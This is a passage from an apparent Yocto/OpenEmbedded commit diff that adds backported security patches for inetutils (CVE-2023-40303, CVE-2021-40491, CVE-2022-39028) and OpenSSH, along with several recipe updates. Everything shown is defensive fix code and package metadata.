246 /* We'll execute the client's command in the home directory
247 * of locuser. Note, that the chdir must be executed after
248diff --git a/src/uucpd.c b/src/uucpd.c
249index 55c3d44..6aba294 100644
250--- a/src/uucpd.c
251+++ b/src/uucpd.c
252@@ -254,7 +254,12 @@ doit (struct sockaddr *sap, socklen_t salen)
253 sprintf (Username, "USER=%s", user);
254 sprintf (Logname, "LOGNAME=%s", user);
255 dologin (pw, sap, salen);
256- setgid (pw->pw_gid);
257+
258+ if (setgid (pw->pw_gid) == -1)
259+ {
260+ fprintf (stderr, "setgid() failed");
261+ return;
262+ }
263 #ifdef HAVE_INITGROUPS
264 initgroups (pw->pw_name, pw->pw_gid);
265 #endif
266@@ -263,7 +268,13 @@ doit (struct sockaddr *sap, socklen_t salen)
267 fprintf (stderr, "Login incorrect.");
268 return;
269 }
270- setuid (pw->pw_uid);
271+
272+ if (setuid (pw->pw_uid) == -1)
273+ {
274+ fprintf (stderr, "setuid() failed");
275+ return;
276+ }
277+
278 execl (uucico_location, "uucico", NULL);
279 perror ("uucico server: execl");
280 }
281--
2822.25.1
283
diff --git a/meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch b/meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch
new file mode 100644
index 0000000000..4bc354d256
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch
@@ -0,0 +1,254 @@
1From 70fe022f9dac760eaece0228cad17e3d29a57fb8 Mon Sep 17 00:00:00 2001
2From: Simon Josefsson <simon@josefsson.org>
3Date: Mon, 31 Jul 2023 13:59:05 +0200
4Subject: [PATCH] CVE-2023-40303: Indent changes in previous commit.
5
6CVE: CVE-2023-40303
7Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=9122999252c7e21eb7774de11d539748e7bdf46d]
8Signed-off-by: Khem Raj <raj.khem@gmail.com>
9Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
10---
11 src/rcp.c | 42 ++++++++++++++++++++++++------------------
12 src/rlogin.c | 12 ++++++------
13 src/rsh.c | 24 ++++++++++++------------
14 src/rshd.c | 24 ++++++++++++------------
15 src/uucpd.c | 16 ++++++++--------
16 5 files changed, 62 insertions(+), 56 deletions(-)
17
18diff --git a/src/rcp.c b/src/rcp.c
19index cdcf8500..652f22e6 100644
20--- a/src/rcp.c
21+++ b/src/rcp.c
22@@ -347,9 +347,10 @@ main (int argc, char *argv[])
23 response ();
24
25 if (setuid (userid) == -1)
26- {
27- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
28- }
29+ {
30+ error (EXIT_FAILURE, 0,
31+ "Could not drop privileges (setuid() failed)");
32+ }
33
34 source (argc, argv);
35 exit (errs);
36@@ -358,9 +359,10 @@ main (int argc, char *argv[])
37 if (to_option)
38 { /* Receive data. */
39 if (setuid (userid) == -1)
40- {
41- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
42- }
43+ {
44+ error (EXIT_FAILURE, 0,
45+ "Could not drop privileges (setuid() failed)");
46+ }
47
48 sink (argc, argv);
49 exit (errs);
50@@ -548,9 +550,10 @@ toremote (char *targ, int argc, char *argv[])
51 free (bp);
52
53 if (setuid (userid) == -1)
54- {
55- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
56- }
57+ {
58+ error (EXIT_FAILURE, 0,
59+ "Could not drop privileges (setuid() failed)");
60+ }
61 }
62 source (1, argv + i);
63 close (rem);
64@@ -645,9 +648,10 @@ tolocal (int argc, char *argv[])
65 }
66
67 if (seteuid (userid) == -1)
68- {
69- error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
70- }
71+ {
72+ error (EXIT_FAILURE, 0,
73+ "Could not drop privileges (seteuid() failed)");
74+ }
75
76 #if defined IP_TOS && defined IPPROTO_IP && defined IPTOS_THROUGHPUT
77 sslen = sizeof (ss);
78@@ -663,9 +667,10 @@ tolocal (int argc, char *argv[])
79 sink (1, vect);
80
81 if (seteuid (effuid) == -1)
82- {
83- error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
84- }
85+ {
86+ error (EXIT_FAILURE, 0,
87+ "Could not drop privileges (seteuid() failed)");
88+ }
89
90 close (rem);
91 rem = -1;
92@@ -1465,9 +1470,10 @@ susystem (char *s, int userid)
93
94 case 0:
95 if (setuid (userid) == -1)
96- {
97- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
98- }
99+ {
100+ error (EXIT_FAILURE, 0,
101+ "Could not drop privileges (setuid() failed)");
102+ }
103
104 execl (PATH_BSHELL, "sh", "-c", s, NULL);
105 _exit (127);
106diff --git a/src/rlogin.c b/src/rlogin.c
107index c543de0c..4360202f 100644
108--- a/src/rlogin.c
109+++ b/src/rlogin.c
110@@ -648,14 +648,14 @@ try_connect:
111 to get the privileged port that rcmd () uses. We now want, however,
112 to run as the real user who invoked us. */
113 if (seteuid (uid) == -1)
114- {
115- error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
116- }
117+ {
118+ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
119+ }
120
121 if (setuid (uid) == -1)
122- {
123- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
124- }
125+ {
126+ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
127+ }
128
129 doit (&osmask); /* The old mask will activate SIGURG and SIGUSR1! */
130
131diff --git a/src/rsh.c b/src/rsh.c
132index 6f60667d..179b47cd 100644
133--- a/src/rsh.c
134+++ b/src/rsh.c
135@@ -278,14 +278,14 @@ main (int argc, char **argv)
136 *argv = (char *) "rlogin";
137
138 if (seteuid (getuid ()) == -1)
139- {
140- error (EXIT_FAILURE, errno, "seteuid() failed");
141- }
142+ {
143+ error (EXIT_FAILURE, errno, "seteuid() failed");
144+ }
145
146 if (setuid (getuid ()) == -1)
147- {
148- error (EXIT_FAILURE, errno, "setuid() failed");
149- }
150+ {
151+ error (EXIT_FAILURE, errno, "setuid() failed");
152+ }
153
154 execv (PATH_RLOGIN, argv);
155 error (EXIT_FAILURE, errno, "cannot execute %s", PATH_RLOGIN);
156@@ -551,14 +551,14 @@ try_connect:
157 }
158
159 if (seteuid (uid) == -1)
160- {
161- error (EXIT_FAILURE, errno, "seteuid() failed");
162- }
163+ {
164+ error (EXIT_FAILURE, errno, "seteuid() failed");
165+ }
166
167 if (setuid (uid) == -1)
168- {
169- error (EXIT_FAILURE, errno, "setuid() failed");
170- }
171+ {
172+ error (EXIT_FAILURE, errno, "setuid() failed");
173+ }
174
175 #ifdef HAVE_SIGACTION
176 sigemptyset (&sigs);
177diff --git a/src/rshd.c b/src/rshd.c
178index 707790e7..3a153a18 100644
179--- a/src/rshd.c
180+++ b/src/rshd.c
181@@ -1848,16 +1848,16 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
182
183 /* Set the gid, then uid to become the user specified by "locuser" */
184 if (setegid ((gid_t) pwd->pw_gid) == -1)
185- {
186- rshd_error ("Cannot drop privileges (setegid() failed)\n");
187- exit (EXIT_FAILURE);
188- }
189+ {
190+ rshd_error ("Cannot drop privileges (setegid() failed)\n");
191+ exit (EXIT_FAILURE);
192+ }
193
194 if (setgid ((gid_t) pwd->pw_gid) == -1)
195- {
196- rshd_error ("Cannot drop privileges (setgid() failed)\n");
197- exit (EXIT_FAILURE);
198- }
199+ {
200+ rshd_error ("Cannot drop privileges (setgid() failed)\n");
201+ exit (EXIT_FAILURE);
202+ }
203
204 #ifdef HAVE_INITGROUPS
205 initgroups (pwd->pw_name, pwd->pw_gid); /* BSD groups */
206@@ -1881,10 +1881,10 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
207 #endif /* WITH_PAM */
208
209 if (setuid ((uid_t) pwd->pw_uid) == -1)
210- {
211- rshd_error ("Cannot drop privileges (setuid() failed)\n");
212- exit (EXIT_FAILURE);
213- }
214+ {
215+ rshd_error ("Cannot drop privileges (setuid() failed)\n");
216+ exit (EXIT_FAILURE);
217+ }
218
219 /* We'll execute the client's command in the home directory
220 * of locuser. Note, that the chdir must be executed after
221diff --git a/src/uucpd.c b/src/uucpd.c
222index 29cfce35..fde7b9c9 100644
223--- a/src/uucpd.c
224+++ b/src/uucpd.c
225@@ -254,10 +254,10 @@ doit (struct sockaddr *sap, socklen_t salen)
226 dologin (pw, sap, salen);
227
228 if (setgid (pw->pw_gid) == -1)
229- {
230- fprintf (stderr, "setgid() failed");
231- return;
232- }
233+ {
234+ fprintf (stderr, "setgid() failed");
235+ return;
236+ }
237 #ifdef HAVE_INITGROUPS
238 initgroups (pw->pw_name, pw->pw_gid);
239 #endif
240@@ -268,10 +268,10 @@ doit (struct sockaddr *sap, socklen_t salen)
241 }
242
243 if (setuid (pw->pw_uid) == -1)
244- {
245- fprintf (stderr, "setuid() failed");
246- return;
247- }
248+ {
249+ fprintf (stderr, "setuid() failed");
250+ return;
251+ }
252
253 execl (uucico_location, "uucico", NULL);
254 perror ("uucico server: execl");
diff --git a/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch b/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch
new file mode 100644
index 0000000000..54252d6bc7
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch
@@ -0,0 +1,67 @@
1From 4e355804d57d5686defc363c70f81e6f58cd08f0 Mon Sep 17 00:00:00 2001
2From: Simon Josefsson <simon@josefsson.org>
3Date: Fri, 17 Dec 2021 21:52:18 -0800
4Subject: [PATCH] ftp: check that PASV/LSPV addresses match.
5
6* NEWS: Mention change.
7* ftp/ftp.c (initconn): Validate returned addresses.
8
9CVE: CVE-2021-40491
10
11Upstream-Status: Backport
12[https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=58cb043b190fd04effdaea7c9403416b436e50dd]
13
14Signed-off-by: Minjae Kim <flowergom@gmail.com>
15---
16 ftp/ftp.c | 21 +++++++++++++++++++++
17 1 file changed, 21 insertions(+)
18
19diff --git a/ftp/ftp.c b/ftp/ftp.c
20index 9813586..7c72cb2 100644
21--- a/ftp/ftp.c
22+++ b/ftp/ftp.c
23@@ -1344,6 +1344,13 @@ initconn (void)
24 uint32_t *pu32 = (uint32_t *) &data_addr_sa4->sin_addr.s_addr;
25 pu32[0] = htonl ( (h[0] << 24) | (h[1] << 16) | (h[2] << 8) | h[3]);
26 }
27+ if (data_addr_sa4->sin_addr.s_addr
28+ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr)
29+ {
30+ printf ("Passive mode address mismatch.\n");
31+ (void) command ("ABOR"); /* Cancel any open connection. */
32+ goto bad;
33+ }
34 } /* LPSV IPv4 */
35 else /* IPv6 */
36 {
37@@ -1374,6 +1381,13 @@ initconn (void)
38 pu32[2] = htonl ( (h[8] << 24) | (h[9] << 16) | (h[10] << 8) | h[11]);
39 pu32[3] = htonl ( (h[12] << 24) | (h[13] << 16) | (h[14] << 8) | h[15]);
40 }
41+ if (data_addr_sa6->sin6_addr.s6_addr
42+ != ((struct sockaddr_in6 *) &hisctladdr)->sin6_addr.s6_addr)
43+ {
44+ printf ("Passive mode address mismatch.\n");
45+ (void) command ("ABOR"); /* Cancel any open connection. */
46+ goto bad;
47+ }
48 } /* LPSV IPv6 */
49 }
50 else /* !EPSV && !LPSV */
51@@ -1394,6 +1408,13 @@ initconn (void)
52 | ((a2 & 0xff) << 8) | (a3 & 0xff) );
53 data_addr_sa4->sin_port =
54 htons (((p0 & 0xff) << 8) | (p1 & 0xff));
55+ if (data_addr_sa4->sin_addr.s_addr
56+ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr)
57+ {
58+ printf ("Passive mode address mismatch.\n");
59+ (void) command ("ABOR"); /* Cancel any open connection. */
60+ goto bad;
61+ }
62 } /* PASV */
63 else
64 {
65--
662.25.1
67
diff --git a/meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch b/meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch
new file mode 100644
index 0000000000..da2da8da8a
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch
@@ -0,0 +1,54 @@
1From eaae65aac967f9628787dca4a2501ca860bb6598 Mon Sep 17 00:00:00 2001
2From: Minjae Kim <flowergom@gmail.com>
3Date: Mon, 26 Sep 2022 22:05:07 +0200
4Subject: [PATCH] telnetd: Handle early IAC EC or IAC EL receipt
5
6Fix telnetd crash if the first two bytes of a new connection
7are 0xff 0xf7 (IAC EC) or 0xff 0xf8 (IAC EL).
8
9The problem was reported in:
10<https://pierrekim.github.io/blog/2022-08-24-2-byte-dos-freebsd-netbsd-telnetd-netkit-telnetd-inetutils-telnetd-kerberos-telnetd.html>.
11
12* NEWS: Mention fix.
13* telnetd/state.c (telrcv): Handle zero slctab[SLC_EC].sptr and
14zero slctab[SLC_EL].sptr.
15
16CVE: CVE-2022-39028
17Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=fae8263e467380483c28513c0e5fac143e46f94f]
18Signed-off-by: Minjae Kim<flowergom@gmail.com>
19---
20 telnetd/state.c | 12 +++++++++---
21 1 file changed, 9 insertions(+), 3 deletions(-)
22
23diff --git a/telnetd/state.c b/telnetd/state.c
24index 2184bca..7948503 100644
25--- a/telnetd/state.c
26+++ b/telnetd/state.c
27@@ -314,15 +314,21 @@ telrcv (void)
28 case EC:
29 case EL:
30 {
31- cc_t ch;
32+ cc_t ch = (cc_t) (_POSIX_VDISABLE);
33
34 DEBUG (debug_options, 1, printoption ("td: recv IAC", c));
35 ptyflush (); /* half-hearted */
36 init_termbuf ();
37 if (c == EC)
38- ch = *slctab[SLC_EC].sptr;
39+ {
40+ if (slctab[SLC_EC].sptr)
41+ ch = *slctab[SLC_EC].sptr;
42+ }
43 else
44- ch = *slctab[SLC_EL].sptr;
45+ {
46+ if (slctab[SLC_EL].sptr)
47+ ch = *slctab[SLC_EL].sptr;
48+ }
49 if (ch != (cc_t) (_POSIX_VDISABLE))
50 pty_output_byte ((unsigned char) ch);
51 break;
52--
532.25.1
54
diff --git a/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb b/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
index cc9410b94e..3a68b34825 100644
--- a/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
+++ b/meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb
@@ -23,6 +23,10 @@ SRC_URI = "${GNU_MIRROR}/inetutils/inetutils-${PV}.tar.gz \
23 file://inetutils-only-check-pam_appl.h-when-pam-enabled.patch \ 23 file://inetutils-only-check-pam_appl.h-when-pam-enabled.patch \
24 file://0001-rcp-fix-to-work-with-large-files.patch \ 24 file://0001-rcp-fix-to-work-with-large-files.patch \
25 file://fix-buffer-fortify-tfpt.patch \ 25 file://fix-buffer-fortify-tfpt.patch \
26 file://CVE-2021-40491.patch \
27 file://CVE-2022-39028.patch \
28 file://0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch \
29 file://0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch \
26" 30"
27 31
28SRC_URI[md5sum] = "04852c26c47cc8c6b825f2b74f191f52" 32SRC_URI[md5sum] = "04852c26c47cc8c6b825f2b74f191f52"
diff --git a/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb b/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
index 5e4460045b..5213b28345 100644
--- a/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
+++ b/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Name Service Switch module for Multicast DNS (zeroconf) name resolution" 1SUMMARY = "Name Service Switch module for Multicast DNS (zeroconf) name resolution"
2HOMEPAGE = "https://github.com/lathiat/nss-mdns" 2HOMEPAGE = "https://github.com/lathiat/nss-mdns"
3DESCRIPTION = "nss-mdns is a plugin for the GNU Name Service Switch (NSS) functionality of the GNU C Library (glibc) providing host name resolution via Multicast DNS (aka Zeroconf, aka Apple Rendezvous, aka Apple Bonjour), effectively allowing name resolution by common Unix/Linux programs in the ad-hoc mDNS domain .local."
3SECTION = "libs" 4SECTION = "libs"
4 5
5LICENSE = "LGPLv2.1+" 6LICENSE = "LGPLv2.1+"
@@ -7,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2d5025d4aa3495befef8f17206a5b0a1"
7 8
8DEPENDS = "avahi" 9DEPENDS = "avahi"
9 10
10SRC_URI = "git://github.com/lathiat/nss-mdns \ 11SRC_URI = "git://github.com/lathiat/nss-mdns;branch=master;protocol=https \
11 " 12 "
12 13
13SRCREV = "41c9c5e78f287ed4b41ac438c1873fa71bfa70ae" 14SRCREV = "41c9c5e78f287ed4b41ac438c1873fa71bfa70ae"
diff --git a/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb b/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
index 7dccc15e03..a4030b7b32 100644
--- a/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
+++ b/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
@@ -1,13 +1,15 @@
1SUMMARY = "Mobile Broadband Service Provider Database" 1SUMMARY = "Mobile Broadband Service Provider Database"
2HOMEPAGE = "http://live.gnome.org/NetworkManager/MobileBroadband/ServiceProviders" 2HOMEPAGE = "http://live.gnome.org/NetworkManager/MobileBroadband/ServiceProviders"
3DESCRIPTION = "Mobile Broadband Service Provider Database stores service provider specific information. When this Database is available the information can be fetched there"
3SECTION = "network" 4SECTION = "network"
4LICENSE = "PD" 5LICENSE = "PD"
5LIC_FILES_CHKSUM = "file://COPYING;md5=87964579b2a8ece4bc6744d2dc9a8b04" 6LIC_FILES_CHKSUM = "file://COPYING;md5=87964579b2a8ece4bc6744d2dc9a8b04"
6SRCREV = "90f3fe28aa25135b7e4a54a7816388913bfd4a2a" 7
7PV = "20201225" 8SRCREV = "aae7c68671d225e6d35224613d5b98192b9b2ffe"
9PV = "20230416"
8PE = "1" 10PE = "1"
9 11
10SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https" 12SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https;branch=main"
11S = "${WORKDIR}/git" 13S = "${WORKDIR}/git"
12 14
13inherit autotools 15inherit autotools
diff --git a/meta/recipes-connectivity/neard/neard_0.16.bb b/meta/recipes-connectivity/neard/neard_0.16.bb
index 7c124a3c0b..dd0742f792 100644
--- a/meta/recipes-connectivity/neard/neard_0.16.bb
+++ b/meta/recipes-connectivity/neard/neard_0.16.bb
@@ -2,21 +2,22 @@ SUMMARY = "Linux NFC daemon"
2DESCRIPTION = "A daemon for the Linux Near Field Communication stack" 2DESCRIPTION = "A daemon for the Linux Near Field Communication stack"
3HOMEPAGE = "http://01.org/linux-nfc" 3HOMEPAGE = "http://01.org/linux-nfc"
4LICENSE = "GPLv2" 4LICENSE = "GPLv2"
5LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
6 file://src/near.h;beginline=1;endline=20;md5=358e4deefef251a4761e1ffacc965d13 \
7 "
5 8
6DEPENDS = "dbus glib-2.0 libnl" 9DEPENDS = "dbus glib-2.0 libnl"
7 10
8SRC_URI = "${KERNELORG_MIRROR}/linux/network/nfc/${BP}.tar.xz \ 11SRC_URI = "git://git.kernel.org/pub/scm/network/nfc/neard.git;protocol=git;branch=master \
9 file://neard.in \ 12 file://neard.in \
10 file://Makefile.am-fix-parallel-issue.patch \ 13 file://Makefile.am-fix-parallel-issue.patch \
11 file://Makefile.am-do-not-ship-version.h.patch \ 14 file://Makefile.am-do-not-ship-version.h.patch \
12 file://0001-Add-header-dependency-to-nciattach.o.patch \ 15 file://0001-Add-header-dependency-to-nciattach.o.patch \
13 " 16 "
14SRC_URI[md5sum] = "5c691fb7872856dc0d909c298bc8cb41"
15SRC_URI[sha256sum] = "eae3b11c541a988ec11ca94b7deab01080cd5b58cfef3ced6ceac9b6e6e65b36"
16 17
17LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \ 18SRCREV = "949795024f7625420e93e288c56e194cb9a3e74a"
18 file://src/near.h;beginline=1;endline=20;md5=358e4deefef251a4761e1ffacc965d13 \ 19
19 " 20S = "${WORKDIR}/git"
20 21
21inherit autotools pkgconfig systemd update-rc.d 22inherit autotools pkgconfig systemd update-rc.d
22 23
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch
new file mode 100644
index 0000000000..3adb981fb4
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch
@@ -0,0 +1,97 @@
1From b3855ff053f5078ec3d3c653cdaedefaa5fc362d Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Fri, 18 Sep 2020 05:23:03 +0000
4Subject: upstream: tweak the client hostkey preference ordering algorithm to
5
6prefer the default ordering if the user has a key that matches the
7best-preference default algorithm.
8
9feedback and ok markus@
10
11OpenBSD-Commit-ID: a92dd7d7520ddd95c0a16786a7519e6d0167d35f
12
13Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
14---
15 sshconnect2.c | 41 ++++++++++++++++++++++++++++++++++++++---
16 1 file changed, 38 insertions(+), 3 deletions(-)
17
18CVE: CVE-2020-14145
19Upstream-Status: Backport [https://anongit.mindrot.org/openssh.git/patch/?id=b3855ff053f5078ec3d3c653cdaedefaa5fc362d]
20Comment: Refreshed first hunk
21
22diff --git a/sshconnect2.c b/sshconnect2.c
23index 347e348c..f64aae66 100644
24--- a/sshconnect2.c
25+++ b/sshconnect2.c
26@@ -1,4 +1,4 @@
27-/* $OpenBSD: sshconnect2.c,v 1.320 2020/02/06 22:48:23 djm Exp $ */
28+/* $OpenBSD: sshconnect2.c,v 1.326 2020/09/18 05:23:03 djm Exp $ */
29 /*
30 * Copyright (c) 2000 Markus Friedl. All rights reserved.
31 * Copyright (c) 2008 Damien Miller. All rights reserved.
32@@ -102,12 +102,25 @@ verify_host_key_callback(struct sshkey *hostkey, struct ssh *ssh)
33 return 0;
34 }
35
36+/* Returns the first item from a comma-separated algorithm list */
37+static char *
38+first_alg(const char *algs)
39+{
40+ char *ret, *cp;
41+
42+ ret = xstrdup(algs);
43+ if ((cp = strchr(ret, ',')) != NULL)
44+ *cp = '\0';
45+ return ret;
46+}
47+
48 static char *
49 order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
50 {
51- char *oavail, *avail, *first, *last, *alg, *hostname, *ret;
52+ char *oavail = NULL, *avail = NULL, *first = NULL, *last = NULL;
53+ char *alg = NULL, *hostname = NULL, *ret = NULL, *best = NULL;
54 size_t maxlen;
55- struct hostkeys *hostkeys;
56+ struct hostkeys *hostkeys = NULL;
57 int ktype;
58 u_int i;
59
60@@ -119,6 +132,26 @@ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
61 for (i = 0; i < options.num_system_hostfiles; i++)
62 load_hostkeys(hostkeys, hostname, options.system_hostfiles[i]);
63
64+ /*
65+ * If a plain public key exists that matches the type of the best
66+ * preference HostkeyAlgorithms, then use the whole list as is.
67+ * Note that we ignore whether the best preference algorithm is a
68+ * certificate type, as sshconnect.c will downgrade certs to
69+ * plain keys if necessary.
70+ */
71+ best = first_alg(options.hostkeyalgorithms);
72+ if (lookup_key_in_hostkeys_by_type(hostkeys,
73+ sshkey_type_plain(sshkey_type_from_name(best)), NULL)) {
74+ debug3("%s: have matching best-preference key type %s, "
75+ "using HostkeyAlgorithms verbatim", __func__, best);
76+ ret = xstrdup(options.hostkeyalgorithms);
77+ goto out;
78+ }
79+
80+ /*
81+ * Otherwise, prefer the host key algorithms that match known keys
82+ * while keeping the ordering of HostkeyAlgorithms as much as possible.
83+ */
84 oavail = avail = xstrdup(options.hostkeyalgorithms);
85 maxlen = strlen(avail) + 1;
86 first = xmalloc(maxlen);
87@@ -159,6 +192,8 @@ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
88 if (*first != '\0')
89 debug3("%s: prefer hostkeyalgs: %s", __func__, first);
90
91+ out:
92+ free(best);
93 free(first);
94 free(last);
95 free(hostname);
96--
97cgit v1.2.3
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch
new file mode 100644
index 0000000000..9fd7e932d1
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch
@@ -0,0 +1,20 @@
1Description: fix double-free memory corruption in ssh-agent
2Author: Marc Deslauriers <marc.deslauriers@canonical.com>
3Origin: minimal fix for https://github.com/openssh/openssh-portable/commit/e04fd6dde16de1cdc5a4d9946397ff60d96568db
4
5Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
6
7CVE: CVE-2021-28041
8Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_8.2p1-4ubuntu0.3.debian.tar.xz]
9Comment: No change in any hunk
10
11--- a/ssh-agent.c
12+++ b/ssh-agent.c
13@@ -496,6 +496,7 @@ process_add_identity(SocketEntry *e)
14 goto err;
15 }
16 free(ext_name);
17+ ext_name = NULL;
18 break;
19 default:
20 error("%s: Unknown constraint %d", __func__, ctype);
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch
new file mode 100644
index 0000000000..bda896f581
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch
@@ -0,0 +1,52 @@
1From a6414400ec94a17871081f7df24f910a6ee01b8b Mon Sep 17 00:00:00 2001
2From: Ali Abdallah <aabdallah@suse.de>
3Date: Wed, 24 Nov 2021 13:33:39 +0100
4Subject: [PATCH] CVE-2021-41617 fix
5
6backport of the following two upstream commits
7
8f3cbe43e28fe71427d41cfe3a17125b972710455
9bf944e3794eff5413f2df1ef37cddf96918c6bde
10
11CVE-2021-41617 failed to correctly initialise supplemental groups
12when executing an AuthorizedKeysCommand or AuthorizedPrincipalsCommand,
13where a AuthorizedKeysCommandUser or AuthorizedPrincipalsCommandUser
14directive has been set to run the command as a different user. Instead
15these commands would inherit the groups that sshd(8) was started with.
16---
17 auth.c | 8 ++++++++
18 1 file changed, 8 insertions(+)
19
20CVE: CVE-2021-41617
21Upstream-Status: Backport [https://bugzilla.suse.com/attachment.cgi?id=854015]
22Comment: No change in any hunk
23Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
24
25diff --git a/auth.c b/auth.c
26index 163038f..a47b267 100644
27--- a/auth.c
28+++ b/auth.c
29@@ -52,6 +52,7 @@
30 #include <limits.h>
31 #include <netdb.h>
32 #include <time.h>
33+#include <grp.h>
34
35 #include "xmalloc.h"
36 #include "match.h"
37@@ -851,6 +852,13 @@ subprocess(const char *tag, struct passwd *pw, const char *command,
38 }
39 closefrom(STDERR_FILENO + 1);
40
41+ if (geteuid() == 0 &&
42+ initgroups(pw->pw_name, pw->pw_gid) == -1) {
43+ error("%s: initgroups(%s, %u): %s", tag,
44+ pw->pw_name, (u_int)pw->pw_gid, strerror(errno));
45+ _exit(1);
46+ }
47+
48 /* Don't use permanently_set_uid() here to avoid fatal() */
49 if (setresgid(pw->pw_gid, pw->pw_gid, pw->pw_gid) == -1) {
50 error("%s: setresgid %u: %s", tag, (u_int)pw->pw_gid,
51--
522.26.2
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch
new file mode 100644
index 0000000000..c899056337
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch
@@ -0,0 +1,189 @@
1From f6213e03887237714eb5bcfc9089c707069f87c5 Mon Sep 17 00:00:00 2001
2From: Damien Miller <djm@mindrot.org>
3Date: Fri, 1 Oct 2021 16:35:49 +1000
4Subject: [PATCH 01/12] make OPENSSL_HAS_ECC checks more thorough
5
6ok dtucker
7
8Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/dee22129bbc61e25b1003adfa2bc584c5406ef2d]
9CVE: CVE-2023-38408
10Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
11---
12 ssh-pkcs11-client.c | 16 ++++++++--------
13 ssh-pkcs11.c | 26 +++++++++++++-------------
14 2 files changed, 21 insertions(+), 21 deletions(-)
15
16diff --git a/ssh-pkcs11-client.c b/ssh-pkcs11-client.c
17index 8a0ffef..41114c7 100644
18--- a/ssh-pkcs11-client.c
19+++ b/ssh-pkcs11-client.c
20@@ -163,7 +163,7 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
21 return (ret);
22 }
23
24-#ifdef HAVE_EC_KEY_METHOD_NEW
25+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
26 static ECDSA_SIG *
27 ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
28 const BIGNUM *rp, EC_KEY *ec)
29@@ -220,12 +220,12 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
30 sshbuf_free(msg);
31 return (ret);
32 }
